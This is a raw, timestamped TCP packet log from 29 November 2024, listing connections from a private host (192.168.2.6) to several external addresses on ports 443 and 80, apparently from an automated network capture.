                                                                                                                                                                                    Nov 29, 2024 19:49:45.395662069 CET49782443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:45.395672083 CET4434978213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:45.395735979 CET49782443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:45.404346943 CET49781443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:45.404364109 CET4434978113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:45.404481888 CET49782443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:45.404495955 CET4434978213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:45.797820091 CET4434977913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:45.798985004 CET49779443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:45.799001932 CET4434977913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:45.799772024 CET49779443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:45.799777031 CET4434977913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:46.255565882 CET4434977913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:46.255651951 CET4434977913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:46.255789995 CET49779443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:46.257740021 CET49779443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:46.257757902 CET4434977913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:46.257769108 CET49779443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:46.257775068 CET4434977913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:46.260413885 CET49793443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:46.260457039 CET4434979313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:46.260556936 CET49793443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:46.260788918 CET49793443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:46.260801077 CET4434979313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:46.732348919 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:47.255657911 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.255723953 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.255779028 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.255788088 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.256968021 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.257030964 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.257034063 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.257045031 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.257291079 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.259875059 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.259880066 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.305023909 CET4434978013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.305512905 CET49780443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.305533886 CET4434978013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.305988073 CET49780443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.305994034 CET4434978013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.306648970 CET4434978213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.306803942 CET4434978113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.306988001 CET49782443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.307003021 CET4434978213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.307163954 CET49781443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.307193995 CET4434978113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.307585955 CET49782443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.307590961 CET4434978213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.307648897 CET49781443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.307655096 CET4434978113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.583643913 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.586673975 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.586704016 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.586849928 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.586853981 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.586880922 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.586884975 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.739856958 CET4434978013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.739950895 CET4434978013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.741580963 CET49780443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.742561102 CET4434978113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.742643118 CET4434978113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.742758036 CET4434978213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.742806911 CET49781443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.742820024 CET4434978213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.742858887 CET49782443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.804986954 CET49780443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.804987907 CET49780443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.805056095 CET4434978013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.805079937 CET4434978013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.907202005 CET49781443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.907233953 CET4434978113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.907247066 CET49781443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.907253027 CET4434978113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.908446074 CET49782443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.908474922 CET4434978213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.912544966 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.937815905 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.937839031 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.938190937 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.938196898 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:47.938431978 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:47.938436985 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.112529039 CET4434979313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.112551928 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.113738060 CET49793443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:48.113766909 CET4434979313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.114347935 CET49793443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:48.114352942 CET4434979313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.117191076 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:48.117203951 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.313520908 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.316282988 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:48.316296101 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.383080006 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.386421919 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:48.386431932 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.389224052 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:48.431328058 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.514597893 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.520446062 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:48.520461082 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.565874100 CET4434979313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.565951109 CET4434979313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.565995932 CET49793443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:48.566163063 CET49793443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:48.566163063 CET49793443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:48.566180944 CET4434979313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.566209078 CET4434979313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.568840027 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:48.568854094 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.717978001 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.722254992 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:48.722276926 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.806042910 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.808748960 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:48.808765888 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:48.810718060 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:48.851336956 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.178015947 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.180792093 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:49.180805922 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.280884981 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.285644054 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:49.285660028 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.288065910 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.332007885 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:49.332017899 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.335777044 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:49.335834980 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:49.335850000 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.344857931 CET49796443192.168.2.6172.217.21.36
                                                                                                                                                                                    Nov 29, 2024 19:49:49.344878912 CET44349796172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.344999075 CET49796443192.168.2.6172.217.21.36
                                                                                                                                                                                    Nov 29, 2024 19:49:49.345211029 CET49796443192.168.2.6172.217.21.36
                                                                                                                                                                                    Nov 29, 2024 19:49:49.345223904 CET44349796172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.379148960 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.381216049 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:49.423332930 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.621282101 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.624139071 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:49.624160051 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.742461920 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.745367050 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:49.745383024 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.746689081 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.749006987 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:49.749017954 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.752187014 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:49.799334049 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.822431087 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:49.825386047 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:49.825402975 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.069180012 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.072511911 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:50.072535992 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.074738979 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.099915028 CET49799443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:50.099942923 CET443497992.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.100166082 CET49799443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:50.102272034 CET49799443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:50.102286100 CET443497992.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.114226103 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:50.114233971 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.119260073 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:50.163337946 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.192428112 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.197015047 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:50.197029114 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.197206974 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.199100018 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:50.199110031 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.201397896 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:50.243336916 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.398356915 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.442003965 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:50.481533051 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:50.481539011 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.642395973 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.645850897 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:50.645869970 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.680246115 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.722007036 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:50.722021103 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.725797892 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:50.767338991 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.804430008 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.808705091 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:50.808726072 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.809983015 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:50.809988022 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.843554020 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:50.846533060 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:50.891330957 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.005455017 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.008212090 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:51.008234978 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.086334944 CET44349796172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.086616993 CET49796443192.168.2.6172.217.21.36
                                                                                                                                                                                    Nov 29, 2024 19:49:51.086628914 CET44349796172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.087677956 CET44349796172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.087759018 CET49796443192.168.2.6172.217.21.36
                                                                                                                                                                                    Nov 29, 2024 19:49:51.088732004 CET49796443192.168.2.6172.217.21.36
                                                                                                                                                                                    Nov 29, 2024 19:49:51.088804960 CET44349796172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.143065929 CET49796443192.168.2.6172.217.21.36
                                                                                                                                                                                    Nov 29, 2024 19:49:51.143079996 CET44349796172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.190498114 CET49796443192.168.2.6172.217.21.36
                                                                                                                                                                                    Nov 29, 2024 19:49:51.208399057 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.212001085 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:51.212013006 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.212301016 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.252377987 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:51.252384901 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.255557060 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:51.299336910 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.341639996 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.344736099 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:51.344753981 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.345309019 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:51.345314026 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.413583040 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.417129993 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:51.417149067 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.557907104 CET443497992.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.557976007 CET49799443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:51.559513092 CET49799443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:51.559520960 CET443497992.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.559768915 CET443497992.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.593164921 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.596000910 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:51.596015930 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.599693060 CET49799443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:51.602396965 CET49799443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:51.643335104 CET443497992.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.794172049 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.797099113 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:51.797118902 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.853992939 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.896483898 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:51.896495104 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.900234938 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:51.900249004 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.945477009 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.948117018 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:51.948127985 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:51.948347092 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:51.948371887 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.037648916 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.040503979 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:52.040527105 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.080745935 CET443497992.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.080848932 CET443497992.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.080907106 CET49799443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:52.080941916 CET49799443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:52.080952883 CET443497992.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.080964088 CET49799443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:52.080971956 CET443497992.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.116048098 CET49800443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:52.116091967 CET443498002.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.116170883 CET49800443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:52.116455078 CET49800443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:52.116468906 CET443498002.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.147392035 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.150217056 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:52.150240898 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.389174938 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.391978025 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:52.392004967 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.413192987 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.460254908 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:52.460288048 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.465038061 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:52.507337093 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.530510902 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.536966085 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:52.536986113 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.577222109 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:52.590148926 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.597405910 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:52.639336109 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.731651068 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.764403105 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:52.764436007 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.796279907 CET49804443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:52.796325922 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.799496889 CET49804443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:52.893918991 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:52.893959999 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.895483017 CET49805443192.168.2.613.107.246.63
